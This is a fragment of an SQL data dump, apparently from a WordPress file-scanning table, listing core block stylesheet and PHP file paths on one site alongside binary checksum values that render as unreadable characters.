('¡ÃcÔOš@«/ûlMð', 'wp-includes/blocks/separator/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/separator/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\röcäJÈ‘,´ÍäU â3', '¾ee[øGÏÍ÷.|+4Sô iüõæ?E5¸{½I]gx—', '', 0, '?'),
('V‘ô¹<é™7GºnÔÿ²—', 'wp-includes/blocks/separator/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/separator/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ' ü——à…™`Á›^Á\r', '˜R»¬•hL‰ZèqGÍzh¸/^cøÔ*ÄCùõËê', '', 0, '?'),
('idÜ¶Ç1¾"—ôùÉ^ï', 'wp-includes/blocks/separator/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/separator/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\röcäJÈ‘,´ÍäU â3', '¾ee[øGÏÍ÷.|+4Sô iüõæ?E5¸{½I]gx—', '', 0, '?'),
('H=ù3P;œTøØÃ~‡', 'wp-includes/blocks/separator/theme-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/separator/theme-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '±‰¨ùå·ÃÞEÈªõó«h', '×ÓZ©È½n_6{‹NÓn;ÍFM>un´Áÿ·þ"', '', 0, '?'),
('„›@<N¤8iyã—»‡›', 'wp-includes/blocks/separator/theme-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/separator/theme-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '­–EOžc¼º¸mùÅ{ñö', 'É/`i-^Œ3Ò—; B¦³Tž;¶¸Ìÿ®#\0ärø}:j', '', 0, '?'),
('“0"§ËG£\Z=ßhV4œ', 'wp-includes/blocks/separator/theme.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/separator/theme.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '±‰¨ùå·ÃÞEÈªõó«h', '×ÓZ©È½n_6{‹NÓn;ÍFM>un´Áÿ·þ"', '', 0, '?'),
('&sšRþ‚‹£¾ÜXå‚<Á¨', 'wp-includes/blocks/separator/theme.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/separator/theme.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '­–EOžc¼º¸mùÅ{ñö', 'É/`i-^Œ3Ò—; B¦³Tž;¶¸Ìÿ®#\0ärø}:j', '', 0, '?'),
('ùžè‹¼‰­–Ó3÷ú²', 'wp-includes/blocks/shortcode/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/shortcode/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'GkÉ‘Í&©×ÊÍ2¦J$', 'éÃµPõ$Üüœåf"ðY°©Ïx¸ÂoB3-n±…ã', '', 0, '?'),
('\Z6B8û˜cžƒŸ±eg', 'wp-includes/blocks/shortcode/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/shortcode/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '£VQG4¯&{˜::“ó\\±Ÿ', '±Q”0›°¾Ô©À%“¡òŸÎ´GÒ,oå"¥¿­Ìj¶2ó', '', 0, '?'),
('è‰ï¹q•æ8OºÏ;ÃA', 'wp-includes/blocks/shortcode/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/shortcode/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '|xPˆÄÍãøÛ‘&ÈÝPˆŽ', 'g¯´ÂµõOÃ3QÈ‚W×qÙä1Ø;•Ô}]ãœßÁ', '', 0, '?'),
('½„#;‡ìe½¶O"õ¼#[', 'wp-includes/blocks/shortcode/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/shortcode/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '£VQG4¯&{˜::“ó\\±Ÿ', '±Q”0›°¾Ô©À%“¡òŸÎ´GÒ,oå"¥¿­Ìj¶2ó', '', 0, '?'),
('3x2ŠÂ§®¢hê_', 'wp-includes/blocks/shortcode/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/shortcode/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '|xPˆÄÍãøÛ‘&ÈÝPˆŽ', 'g¯´ÂµõOÃ3QÈ‚W×qÙä1Ø;•Ô}]ãœßÁ', '', 0, '?'),
('îá²N–”ç¦F¦VïYìC', 'wp-includes/blocks/shortcode.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/shortcode.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ó0tâ	í£Ú¨.™j²', '{Ž…bw\n~ªŒ4øn"‚—"þÓÍ÷ê#.m¿/#1', '', 0, '?'),
('ˆ9ËŽ>Ñ×Ú7', 'wp-includes/blocks/site-logo/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-logo/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'øjâo$™gê·yÔŒ¤', '·ƒæIËÓ­1ûÈV:ÂG‡«R¡ Ø‚ªª¶Yb¶', '', 0, '?'),
('ævÑŸŽH¨ýË5%', 'wp-includes/blocks/site-logo/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-logo/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÖOê›Þ\rv0ÃàÂù', 'EÀÛËg’óØ]&Õ''5±ëóÀ†‰zšŸåA|', '', 0, '?'),
('*TÇšç—qG6÷¸RÚäH÷', 'wp-includes/blocks/site-logo/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-logo/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '˜ã¢ytÑÛ©BàØXØ', '€”|8(ä''®–ï¡:={Â;AZ¦`åá''‰]æ¹Eh	', '', 0, '?'),
('IÂƒ“&{ýž;Ð-HÖï‹', 'wp-includes/blocks/site-logo/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-logo/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÖOê›Þ\rv0ÃàÂù', 'EÀÛËg’óØ]&Õ''5±ëóÀ†‰zšŸåA|', '', 0, '?'),
('Ì=`Ê:‚°º®Ÿòx~”ë', 'wp-includes/blocks/site-logo/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-logo/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '˜ã¢ytÑÛ©BàØXØ', '€”|8(ä''®–ï¡:={Â;AZ¦`åá''‰]æ¹Eh	', '', 0, '?'),
('¹ž<eJô½í5}™Ûj', 'wp-includes/blocks/site-logo/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-logo/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\\áót¹2(á”ñŽ¾yø', '™rÔG½vtâ4‚:.r{98~rpÖS”¬œs‚6K', '', 0, '?'),
('è¬¤já¶Ø,ÐÓðÛ=>', 'wp-includes/blocks/site-logo/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-logo/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ';,÷Šð	zWS$«üƒ\ZZ', '+°Æ<¢VaÝ\rRM%ñÐq¤tAù®A»P<´ó˜}', '', 0, '?'),
('7ÞY|7”^\Z™£ËÏVq', 'wp-includes/blocks/site-logo/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-logo/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\\áót¹2(á”ñŽ¾yø', '™rÔG½vtâ4‚:.r{98~rpÖS”¬œs‚6K', '', 0, '?'),
('vÒ×q?\0Ú{í´Ê=®Å­e', 'wp-includes/blocks/site-logo/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-logo/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ';,÷Šð	zWS$«üƒ\ZZ', '+°Æ<¢VaÝ\rRM%ñÐq¤tAù®A»P<´ó˜}', '', 0, '?'),
('‰  êêg¶²×Ü%ç!ž', 'wp-includes/blocks/site-logo.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-logo.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '§ðÚg Éx6ý£$oò0', 'ëP]¹T~¢Éñ 2=àköùw^ÅºFÇcÆáž', '', 0, '?'),
('wZèè¸kFD9«œÄÎÙh', 'wp-includes/blocks/site-tagline/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-tagline/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '@|<tÍ¸Ú¤Ò\nhf1Ë3', 'ð%Ög`ý¦=FsXû?¹‰WS‚Èí}~¶=.', '', 0, '?'),
('®öº@PwÓyèÅÙ3‚Ks', 'wp-includes/blocks/site-tagline/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-tagline/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '"ã‘ÂäÜr÷38ÅßŸ', 'ªÏÅ²þuÎ‘§uÆÞ-þ¤Ð x“©m’oCÝ\0£±/#í', '', 0, '?'),
('\nšéÑÁ—á#Ýñx|]', 'wp-includes/blocks/site-tagline/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-tagline/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '9së+2cü1À\\é%Ž\0{', 'ÈÜZkŽRþâ¨ˆÕ\Z5‰pý Éô—â¾m\\ónzÊþ', '', 0, '?'),
('˜ÙÀv¨ŽÒK:àøZF', 'wp-includes/blocks/site-tagline/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-tagline/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '"ã‘ÂäÜr÷38ÅßŸ', 'ªÏÅ²þuÎ‘§uÆÞ-þ¤Ð x“©m’oCÝ\0£±/#í', '', 0, '?'),
('”S7ÀäzÇ«—WÌ~Ó2ÿ', 'wp-includes/blocks/site-tagline/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-tagline/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '9së+2cü1À\\é%Ž\0{', 'ÈÜZkŽRþâ¨ˆÕ\Z5‰pý Éô—â¾m\\ónzÊþ', '', 0, '?'),
('®ý¬Êœ\\"±âèz@*>Ô\Z', 'wp-includes/blocks/site-tagline.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-tagline.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'µ2oH"Ïµ8Œ¡ùî­zw ', '‡†µÁühÂÚð¬9ßDï¾P"ÚÝÏ‘ÂhfŸ¬f%¼', '', 0, '?'),
('h OT,$Ýâ(ú˜ççãËô', 'wp-includes/blocks/site-title/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-title/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ý’Ìþ¯9f \0ð,C', 'ø©|4àG”ê‡Ž¦¿ACKò‰ÍE0q­"Þ', '', 0, '?'),
('n?Þå<}rm''Üeq c', 'wp-includes/blocks/site-title/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-title/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'agÃ»?cWò;R*Æ÷ï', 'Žp#=žàÆSZ9â”Æåìß¯ÀÛ:ðf§=/¡Þª"/', '', 0, '?'),
('ŽE‘H»¨ª!¨£Áh€<y', 'wp-includes/blocks/site-title/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-title/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '@ö{Râýb\0¥ñ›Û”', 'Í¸Få!¥•jöÆGµÍé³vüh€ÍOðô¹Ñ5d', '', 0, '?'),
('"¯ÐÍÓÛ¯ª¨6§·7?', 'wp-includes/blocks/site-title/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-title/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'agÃ»?cWò;R*Æ÷ï', 'Žp#=žàÆSZ9â”Æåìß¯ÀÛ:ðf§=/¡Þª"/', '', 0, '?'),
('ïÙÈ4…~§Ž^U1Exæƒ', 'wp-includes/blocks/site-title/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-title/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '@ö{Râýb\0¥ñ›Û”', 'Í¸Få!¥•jöÆGµÍé³vüh€ÍOðô¹Ñ5d', '', 0, '?'),
('¤Cž¥ÍEK_÷•ÂAy[Ð¶', 'wp-includes/blocks/site-title/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-title/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'kêÆþóÖ]×Tƒƒ-Àk', '@vTZÃˆÍÉõåÄãWý´­pRÂþŠ$za', '', 0, '?'),
('ºJÐ\0Ž6 ¨‡9åV/ß', 'wp-includes/blocks/site-title/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-title/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'WVÙ¾[¡ÕC#Œ1†‡ÀE‘', 'TŠOÑIA3œF‚KÎedè£Þ8¤à/©R†>%g', '', 0, '?'),
('HcˆÃîv>]|Hº''¿', 'wp-includes/blocks/site-title/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-title/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'kêÆþóÖ]×Tƒƒ-Àk', '@vTZÃˆÍÉõåÄãWý´­pRÂþŠ$za', '', 0, '?'),
('žýý‡/¡tÔj\r‡?†#', 'wp-includes/blocks/site-title/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-title/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'WVÙ¾[¡ÕC#Œ1†‡ÀE‘', 'TŠOÑIA3œF‚KÎedè£Þ8¤à/©R†>%g', '', 0, '?'),
('7oj@Ûè•J  CöÈ¿‘š', 'wp-includes/blocks/site-title.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/site-title.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ñ´®d]í™[ÌuÏ’,·', 'A™„_ö*;\Z •¼Éÿ­Ö\n8Û‘À3ô”¯C_\r', '', 0, '?'),
('LàÀ\ræ%ÂÂ{®·', 'wp-includes/blocks/social-link/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/social-link/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ',Ž33¸Ü5„Ù¬äz"wØÊ', 'ÚÁ¶ç|,§¸zf<UAÝzî1¥	ÄP³&f€b(‹5Ì', '', 0, '?'),
('Š‹…òv†r@¬{âc{', 'wp-includes/blocks/social-link/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/social-link/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ' !v¤w)PX™''Ã©ÒøøŸ', '°ÈŠ—çö¡bŽhé	­	fÍ ¦pîÍõCP¬~', '', 0, '?'),
('á–îa0P@Üa\\xŠþ-', 'wp-includes/blocks/social-link/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/social-link/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'h|›Hú?…ÜúfÑe‹I', 'ë=¢ºõJ¢£L«!â<ö\0èùf¢/7ÀpÉÅ^Wˆ', '', 0, '?'),
('‰ñÚ¸P¡ÊÔÖºb²', 'wp-includes/blocks/social-link/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/social-link/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ' !v¤w)PX™''Ã©ÒøøŸ', '°ÈŠ—çö¡bŽhé	­	fÍ ¦pîÍõCP¬~', '', 0, '?'),
('‡ÍJ”H6½KF‰ìþp~³', 'wp-includes/blocks/social-link/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/social-link/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'h|›Hú?…ÜúfÑe‹I', 'ë=¢ºõJ¢£L«!â<ö\0èùf¢/7ÀpÉÅ^Wˆ', '', 0, '?'),
('K>ˆ^[¯P‘Fí1‹h:', 'wp-includes/blocks/social-link.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/social-link.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '^êÂùR}b´!Ûãé', 'Äñð­:H%Š9ö	OÖÇe"à!ðk¼wí|²Þl', '', 0, '?'),
('¿˜¸s¢¢ôÜçïèÅv ', 'wp-includes/blocks/social-links/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/social-links/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ˆ±B@™2·À•íd@ÑÉ', '“¡”¾Ñú“;yY¦¿l]¿jiÚp¾¦Èˆ\0¥Æ´<ßQ', '', 0, '?'),
('žª€ï57›—D×;TkC', 'wp-includes/blocks/social-links/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/social-links/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'PST8G,0Åö[dù', '''Ì—(o5?9¡‡’ÁÌ`,—O‡ƒ3zYÓd}P¡Ï', '', 0, '?'),
('m)\r¼…äôaHš­E±', 'wp-includes/blocks/social-links/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/social-links/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'H¼rÃ2¦ÄJ¢ùÃè<~C', '÷‚ðÏI6è\r\n?ëx£êh†òG#Òî‘âÚ›\ZüT¼', '', 0, '?'),
('r¶Ÿöá&EöÊeD£q', 'wp-includes/blocks/social-links/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/social-links/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¤—ÉÓ!¨ÓÜ",?&`¯', 'È¯\r¯ŽÇck¹?ãDŸùø]	^-èfLÜÐÊ>\0¥', '', 0, '?'),
('\ná½	6ìí4Rè9øª‹', 'wp-includes/blocks/social-links/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/social-links/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'e³6"­7›öz}jI', 'Íþ\rP°Ö¯^§ÎN·³•0U¾Uo…¨äw²ÛØŽ'';\Z®', '', 0, '?'),
('}²“lÅ8å\\í;ÙÎÀæ~', 'wp-includes/blocks/social-links/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/social-links/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'û>ÅÄyšåÊLåv', 'ê£Ñ—Ð™éäÌÕu§Á¡N2Ä2€ò"ô¢©$ydâ', '', 0, '?'),
('¹ÿ{ZÌñVäÇö­$“§', 'wp-includes/blocks/social-links/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/social-links/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'žÃÙ_ÎíØtzŽ\\P', 'q–í“rê7ç-¬I¡pªàJ×ˆI!ÜéV‘pÑ¸jç', '', 0, '?'),
('gÓÙ"}øHßê,ë–dñ', 'wp-includes/blocks/social-links/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/social-links/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ú%ŽE}–w\rÆcŒ:5Ø', '<=ò¥iaªœ.‘šõkô°{…UãÐ#\0‡ëéÊôµ', '', 0, '?'),
('çš\ZÊIðó˜˜í°Š™é', 'wp-includes/blocks/social-links/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/social-links/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '#0ùCá§O¾è.ˆ;’Â', 'Õ™éÜºÐ¬7¡JhA%mì,÷>To¥WäÜÚw†B¨5', '', 0, '?'),
('"‹ø“K—6^¥4Vý}™À', 'wp-includes/blocks/spacer/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/spacer/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '2~Pa\ZjmÞ¬˜bè¸', ' ÊægçhÕÑU:~øM£\ZLB3JM{\r…W„Üë', '', 0, '?'),
('¨äáê”•Ts™\r%¨LJåM', 'wp-includes/blocks/spacer/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/spacer/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\rèzP©ª#ƒ®‘R°\r$-', 'Þ!]L¥13q+€é#u}NÃ!"oh\0ôÕx~¤', '', 0, '?'),
('J³¤µ;<ßÊC{ß«©®NŸ', 'wp-includes/blocks/spacer/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/spacer/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '&PúG>éu¡¯³ìYªç7', 's<¯åf7šä''¤â7$ð«`~H³\r|JáÀ@', '', 0, '?'),
('u)zïZí¥hLæPˆ|¬', 'wp-includes/blocks/spacer/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/spacer/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\rèzP©ª#ƒ®‘R°\r$-', 'Þ!]L¥13q+€é#u}NÃ!"oh\0ôÕx~¤', '', 0, '?'),
('>[— g«3d½¨“¤ ', 'wp-includes/blocks/spacer/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/spacer/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '&PúG>éu¡¯³ìYªç7', 's<¯åf7šä''¤â7$ð«`~H³\r|JáÀ@', '', 0, '?'),
(',IpØØUíwäbä§A@#', 'wp-includes/blocks/spacer/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/spacer/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '”éñ6•­4ég1¤)Ç÷Úb', '­SWlšiÆ"ká0ÝMÂÉLÂ[¹¥T¾«û€¼', '', 0, '?'),
('Æt¯¿\Zâ»êo+ÝÕØ´', 'wp-includes/blocks/spacer/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/spacer/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'sÞk“Ëék3zÄÓU)Ä', 'u2ÿTØÚz"»„íÿÏ-g¾‰¶&]ÌVÛj²•$O>‹', '', 0, '?'),
('°Ü°ÁÛø¾ò_~·h	sc', 'wp-includes/blocks/spacer/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/spacer/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '”éñ6•­4ég1¤)Ç÷Úb', '­SWlšiÆ"ká0ÝMÂÉLÂ[¹¥T¾«û€¼', '', 0, '?'),
('"\nä’å×4jÝSÃ‹†', 'wp-includes/blocks/spacer/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/spacer/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'sÞk“Ëék3zÄÓU)Ä', 'u2ÿTØÚz"»„íÿÏ-g¾‰¶&]ÌVÛj²•$O>‹', '', 0, '?'),
('´^Öu[Õp}`BøóW1', 'wp-includes/blocks/table/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/table/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÒHùüwøðæÊ ¥öÁA', '\r*®$|ê•õåy0E›Sy 3qx2O†R!Ê„ÒN''å', '', 0, '?'),
('±ÆÃ‡ú‰JV´W]I¢', 'wp-includes/blocks/table/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/table/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'U*N.y˜^ŠÆá¼ÏsÅ', '•Z>t>7^ëÒ™æ_ÕÓêÍ§h¶€èžú„ûôÓvþk', '', 0, '?'),
(';í2ª÷yTÞWðKsª¼˜a', 'wp-includes/blocks/table/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/table/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ø^qá%’ÕmZÅò,Ç1', 'ËãWO˜)ÍÕjï)øÐêþ“œÝÊAg3$0±ã$[èôm', '', 0, '?'),
('\n}†ñ''Ù©B»3ü9­:¸', 'wp-includes/blocks/table/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/table/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'U*N.y˜^ŠÆá¼ÏsÅ', '•Z>t>7^ëÒ™æ_ÕÓêÍ§h¶€èžú„ûôÓvþk', '', 0, '?'),
('§+F—4Þ\núõq¹±¤"]', 'wp-includes/blocks/table/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/table/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ø^qá%’ÕmZÅò,Ç1', 'ËãWO˜)ÍÕjï)øÐêþ“œÝÊAg3$0±ã$[èôm', '', 0, '?'),
('šê-''f¨ß•?X:4\r!', 'wp-includes/blocks/table/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/table/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'è?Ý!ÍûAƒ¥¼Ò‰¬–', 'šƒ²Ž´¾5A¤@óÔÚÈ¥íBC*h/€×ù¥`œ¶Ø’', '', 0, '?'),
('tØŠ\0a¶§\\ _''WÞ', 'wp-includes/blocks/table/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/table/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Séaq¨*yz-T,)‰	É', 'Bú~­7#ç\\ ·"ïz@·Ä*šÃfx‰5ñ', '', 0, '?'),
('õ(T/Iûƒˆ‹eêvB', 'wp-includes/blocks/table/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/table/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'VÑ:¿P:…¦T¼PÛ>\n', '®‘Õ¥ÆkËÊ.y8>J=.€Æ	ÜÅŠû,øÆBæû#{', '', 0, '?'),
('ÓÑào(ýHŽttxû.', 'wp-includes/blocks/table/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/table/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ýiß@îÚµÖfžO€–ƒ', 'upXî;Á`qìRµç¢©J0\ZÁŠ bžY·¯‚˜', '', 0, '?'),
('ÇämyvHåò½Ì‡àÎ', 'wp-includes/blocks/table/theme-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/table/theme-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ãM©W\n)ûŽGÁkC†', '8>€¾*ŽD#Ò''®*-v/ËžÑ>ÜQë¼/O’cÌã', '', 0, '?'),
('ˆ›úËB±+†y\0x•a¶$', 'wp-includes/blocks/table/theme-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/table/theme-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '"Ò®»-uYBr›ÜéyÔZþ', '¦¹ñ‰¬ñuÅšÇáÌk°¾1ñ¡h˜™ëtõC©oÕ­˜(', '', 0, '?'),
('«»_±Qó|Ý]žÅçæ`\Z¨', 'wp-includes/blocks/table/theme.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/table/theme.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ãM©W\n)ûŽGÁkC†', '8>€¾*ŽD#Ò''®*-v/ËžÑ>ÜQë¼/O’cÌã', '', 0, '?'),
